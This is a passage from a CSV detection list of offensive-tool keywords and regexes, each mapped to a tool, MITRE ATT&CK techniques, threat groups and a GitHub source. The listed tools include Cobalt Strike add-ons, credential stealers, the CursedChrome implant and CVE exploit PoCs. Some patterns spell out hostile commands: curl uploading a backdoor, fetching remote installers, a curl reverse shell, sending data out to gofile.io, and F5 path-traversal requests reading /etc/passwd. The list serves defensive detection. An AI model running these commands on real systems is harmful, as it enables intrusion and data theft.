"*CSSG_load.cna*",".{0,1000}CSSG_load\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RCStep/CSSG","1","1","N/A","N/A","10","10","654","112","2025-01-08T23:11:49Z","2021-01-12T14:39:06Z","39169"
"*CStealer Builder ~ *",".{0,1000}CStealer\sBuilder\s\~\s.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","0","N/A","N/A","10","","N/A","","","","39170"
"*CStealer_assets\*",".{0,1000}CStealer_assets\\.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","0","N/A","N/A","10","","N/A","","","","39171"
"*C-Sto/gosecretsdump*",".{0,1000}C\-Sto\/gosecretsdump.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","39172"
"*C-Sto/goWMIExec*",".{0,1000}C\-Sto\/goWMIExec.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","1","N/A","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","39173"
"*cs-token-vault.git*",".{0,1000}cs\-token\-vault\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","N/A","10","10","142","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z","39174"
"*CT_Indirect_Syscalls.c*",".{0,1000}CT_Indirect_Syscalls\.c.{0,1000}","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","N/A","2","186","24","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z","39180"
"*CT_Indirect_Syscalls.exe*",".{0,1000}CT_Indirect_Syscalls\.exe.{0,1000}","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","N/A","2","186","24","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z","39181"
"*CT_Indirect_Syscalls.sln*",".{0,1000}CT_Indirect_Syscalls\.sln.{0,1000}","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","N/A","2","186","24","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z","39182"
"*CT_Indirect_Syscalls.vcxproj*",".{0,1000}CT_Indirect_Syscalls\.vcxproj.{0,1000}","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","N/A","2","186","24","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z","39183"
"*cuba_support@exploit.im*",".{0,1000}cuba_support\@exploit\.im.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","39184"
"*cuba4ikm4jakjgmkezytyawtdgr2xymvy6nvzgw5cglswg3si76icnqd.onion*",".{0,1000}cuba4ikm4jakjgmkezytyawtdgr2xymvy6nvzgw5cglswg3si76icnqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","39185"
"*cube0x0/CVE-2021-1675*",".{0,1000}cube0x0\/CVE\-2021\-1675.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/cube0x0/CVE-2021-1675","1","1","N/A","N/A","10","10","1879","582","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z","39186"
"*cube0x0/LdapSignCheck*",".{0,1000}cube0x0\/LdapSignCheck.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","N/A","10","10","189","25","2024-08-07T09:32:20Z","2022-02-24T20:25:31Z","39187"
"*cube0x0/MiniDump*",".{0,1000}cube0x0\/MiniDump.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","39188"
"*cube0x0/MiniDump*",".{0,1000}cube0x0\/MiniDump.{0,1000}","offensive_tool_keyword","onex","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","N/A","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","39189"
"*cube0x0/SharpMapExec*",".{0,1000}cube0x0\/SharpMapExec.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","1","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","39190"
"*cuddlephish*stealer.js",".{0,1000}cuddlephish.{0,1000}stealer\.js","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","N/A","10","5","487","51","2024-11-21T17:36:55Z","2023-08-02T14:30:41Z","39191"
"*cuddlephish-main*",".{0,1000}cuddlephish\-main.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","N/A","10","5","487","51","2024-11-21T17:36:55Z","2023-08-02T14:30:41Z","39192"
"*CUPLIS BYPASSS SHELL*",".{0,1000}CUPLIS\sBYPASSS\sSHELL.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","39193"
"*curl * --upload-file backdoor.php -v*",".{0,1000}curl\s.{0,1000}\s\-\-upload\-file\sbackdoor\.php\s\-v.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","39194"
"*curl --connect-timeout 3.14 -s ifconfig.me*",".{0,1000}curl\s\-\-connect\-timeout\s3\.14\s\-s\sifconfig\.me.{0,1000}","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","0","N/A","N/A","8","2","129","17","2024-07-19T06:40:59Z","2023-06-02T10:06:41Z","39195"
"*curl -F * https://*.gofile.io/uploadFile*",".{0,1000}curl\s\-F\s.{0,1000}\shttps\:\/\/.{0,1000}\.gofile\.io\/uploadFile.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","39196"
"*curl -fsSL https://gsocket.io/x*",".{0,1000}curl\s\-fsSL\shttps\:\/\/gsocket\.io\/x.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","39197"
"*curl -fsSL https://tiny.cc/gsinst*",".{0,1000}curl\s\-fsSL\shttps\:\/\/tiny\.cc\/gsinst.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","39198"
"*curl http*/handling-form-submission-complete/rce.jsp*",".{0,1000}curl\shttp.{0,1000}\/handling\-form\-submission\-complete\/rce\.jsp.{0,1000}","offensive_tool_keyword","Spring4Shell","Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/reznok/Spring4Shell-POC","1","0","N/A","N/A","N/A","4","311","236","2022-08-04T18:26:18Z","2022-03-31T00:24:28Z","39199"
"*curl http://172.23.0.1:1337/main*",".{0,1000}curl\shttp\:\/\/172\.23\.0\.1\:1337\/main.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","39201"
"*curl https://curlshell*",".{0,1000}curl\shttps\:\/\/curlshell.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","#linux","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","39206"
"*curl https://github.com/antoniomika.key*",".{0,1000}curl\shttps\:\/\/github\.com\/antoniomika\.key.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","39207"
"*curl -L -o ahk.exe https://github.com/AutoHotkey/*",".{0,1000}curl\s\-L\s\-o\sahk\.exe\shttps\:\/\/github\.com\/AutoHotkey\/.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","39209"
"*curl -L powerview.sh *",".{0,1000}curl\s\-L\spowerview\.sh\s.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","#linux","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","39210"
"*curl -Ns telnet://*",".{0,1000}curl\s\-Ns\stelnet\:\/\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","39211"
"*curl --output *http*/tomcatwar.jsp?*",".{0,1000}curl\s\-\-output\s.{0,1000}http.{0,1000}\/tomcatwar\.jsp\?.{0,1000}","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/craig/SpringCore0day","1","0","N/A","N/A","N/A","4","394","194","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z","39212"
"*curl -s -N http://127.0.0.1:4040/api/tunnels*",".{0,1000}curl\s\-s\s\-N\shttp\:\/\/127\.0\.0\.1\:4040\/api\/tunnels.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","0","#linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","39213"
"*curl -s -o test.elf http://0.0.0.0:8001/test.elf*",".{0,1000}curl\s\-s\s\-o\stest\.elf\shttp\:\/\/0\.0\.0\.0\:8001\/test\.elf.{0,1000}","offensive_tool_keyword","POC","Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604)","T1190 - T1059 - T1071 - T1105 - T1041","TA0001 - TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","Exploitation tool","https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ","1","0","N/A","N/A","9","2","114","39","2024-01-20T16:59:23Z","2023-11-03T22:06:09Z","39214"
"*curl -sk 'https://*/tmui/login.jsp/.. /tmui/util/getTabSet.jsp?tabId=Vulnerable*",".{0,1000}curl\s\-sk\s\'https\:\/\/.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/util\/getTabSet\.jsp\?tabId\=Vulnerable.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","39215"
"*curl -v -k  'https://*/tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd*",".{0,1000}curl\s\-v\s\-k\s\s\'https\:\/\/.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileRead\.jsp\?fileName\=\/etc\/passwd.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/jas502n/CVE-2020-5902","1","0","#linux","N/A","N/A","4","373","111","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z","39216"
"*curl -v -k  'https://*/tmui/login.jsp/.. /tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin*",".{0,1000}curl\s\-v\s\-k\s\s\'https\:\/\/.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/tmshCmd\.jsp\?command\=list\+auth\+user\+admin.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","N/A","4","373","111","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z","39217"
"*curl -x socks5h://127.0.0.1:*",".{0,1000}curl\s\-x\ssocks5h\:\/\/127\.0\.0\.1\:.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","39218"
"*curl*/tmp/exploit-dirty-pipe*",".{0,1000}curl.{0,1000}\/tmp\/exploit\-dirty\-pipe.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","N/A","1","9","6","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z","39220"
"*curlshell.py*",".{0,1000}curlshell\.py.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","#linux","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","39222"
"*cursed chrome",".{0,1000}cursed\schrome","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","39225"
"*cursed cookies",".{0,1000}cursed\scookies","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","39226"
"*CursedChrome API server is now listening on port*",".{0,1000}CursedChrome\sAPI\sserver\sis\snow\slistening\son\sport.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","#content","N/A","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","39227"
"*CursedChrome WebSocket server is now running on port*",".{0,1000}CursedChrome\sWebSocket\sserver\sis\snow\srunning\son\sport.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","#content","N/A","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","39228"
"*CursedChrome-master.zip*",".{0,1000}CursedChrome\-master\.zip.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","1","N/A","N/A","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","39229"
"*Cursors\cursorinit.vbs*",".{0,1000}Cursors\\cursorinit\.vbs.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","39230"
"*custom_payload_generator.*",".{0,1000}custom_payload_generator\..{0,1000}","offensive_tool_keyword","cobaltstrike","Various Aggressor Scripts I've Created.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - 